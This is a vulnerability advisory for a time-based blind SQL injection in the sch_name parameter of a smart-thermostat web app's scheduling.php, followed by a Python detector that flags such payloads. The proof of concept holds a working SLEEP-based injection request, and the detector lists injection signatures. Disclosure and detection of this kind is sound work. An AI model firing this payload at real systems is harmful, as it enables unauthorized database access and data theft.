Description:
A security vulnerability has been identified in the *PiHome MaxAir Smart Thermostat* system that permits an authenticated attacker to execute arbitrary SQL statements against the backend database. The issue resides in the scheduling.php component, specifically in how the sch_name POST parameter is handled. The application fails to properly sanitize user-supplied input, allowing SQL injection via crafted payloads. This flaw enables a remote authenticated user to exfiltrate sensitive information, manipulate records, or perform denial-of-service operations (e.g., time-based blind injection).

Technical Details:
*Vulnerable Endpoint:* scheduling.php
*Vulnerable Parameter:* sch_name
*Attack Vector:* Authenticated HTTP POST request.

Proof of Concept (PoC):

POST /scheduling.php HTTP/1.1
Host: 127.0.0.1:8000
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=51i6c6j0dcnlhgrqtt76gbb5eo; PiHomeLanguage=en

Monday_en=1&Friday_en=1&sch_name='+AND+(SELECT+1523+FROM+(SELECT(SLEEP(5)))ZNqW)+AND+'QgEj'='QgEj&start_time_state=0&start_time=21:24&end_time_state=0&end_time=21:22&submit=Submit

*Explanation:*
The sch_name parameter is vulnerable to SQL injection. The payload in the example above will cause a 5-second delay in the server response if the injection is successful, demonstrating time-based blind SQLi. The presence of such behavior confirms arbitrary SQL query execution.
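Detection logic for the request shape described above, added here as an example and not part of the original advisory or the PiHome project: it decodes a form-encoded POST body, isolates the sch_name field and flags the time-delay primitive, sub-select and quote-balanced tautology tail that make up a blind-injection payload. The two sample requests are constructed (the session cookie is a placeholder), and the indicator set is an assumption, not an exhaustive signature list.

```python
import re
from urllib.parse import parse_qs

# Constructed request in the shape of the advisory's PoC; cookie value is a placeholder.
VULN_REQUEST = (
    "POST /scheduling.php HTTP/1.1\r\n"
    "Host: 127.0.0.1:8000\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cookie: PHPSESSID=<placeholder>; PiHomeLanguage=en\r\n"
    "\r\n"
    "Monday_en=1&Friday_en=1&sch_name='+AND+(SELECT+1523+FROM+(SELECT(SLEEP(5)))ZNqW)"
    "+AND+'QgEj'='QgEj&start_time_state=0&start_time=21:24&end_time_state=0"
    "&end_time=21:22&submit=Submit"
)
# Constructed benign request: a normal schedule name must not trigger any indicator.
BENIGN_REQUEST = (
    "POST /scheduling.php HTTP/1.1\r\n"
    "Host: 127.0.0.1:8000\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "Monday_en=1&sch_name=Evening+warm-up&start_time=21:24&end_time=21:22&submit=Submit"
)

# Assumed indicator set: time-delay functions of common engines, an injected sub-select,
# and the "AND 'x'='x" tail that keeps the hijacked WHERE clause syntactically valid.
INDICATORS = {
    "time_delay": re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP)\s*\(|WAITFOR\s+DELAY", re.I),
    "quote_tautology": re.compile(r"\b(AND|OR)\s+'[^']*'\s*=\s*'", re.I),
    "subselect": re.compile(r"\(\s*SELECT\b", re.I),
}

def split_request(raw):
    """Return (request path, body) from a raw HTTP/1.1 request string."""
    head, _, body = raw.partition("\r\n\r\n")
    return head.split(" ", 2)[1], body

def indicators_in(value):
    """Names of every indicator whose pattern matches the decoded field value."""
    return [label for label, rx in INDICATORS.items() if rx.search(value)]

def scan_form_body(body, watched=("sch_name",)):
    """Map each watched form field to the indicators found in its decoded value."""
    fields = parse_qs(body, keep_blank_values=True)  # '+' -> space, %xx decoded, split on first '='
    hits = {}
    for name in watched:
        for value in fields.get(name, []):
            found = indicators_in(value)
            if found:
                hits[name] = found
    return hits

def scan_request(raw):
    """Scan one raw request; result carries the path so a SIEM rule can scope it to scheduling.php."""
    path, body = split_request(raw)
    return {"path": path, "hits": scan_form_body(body)}
```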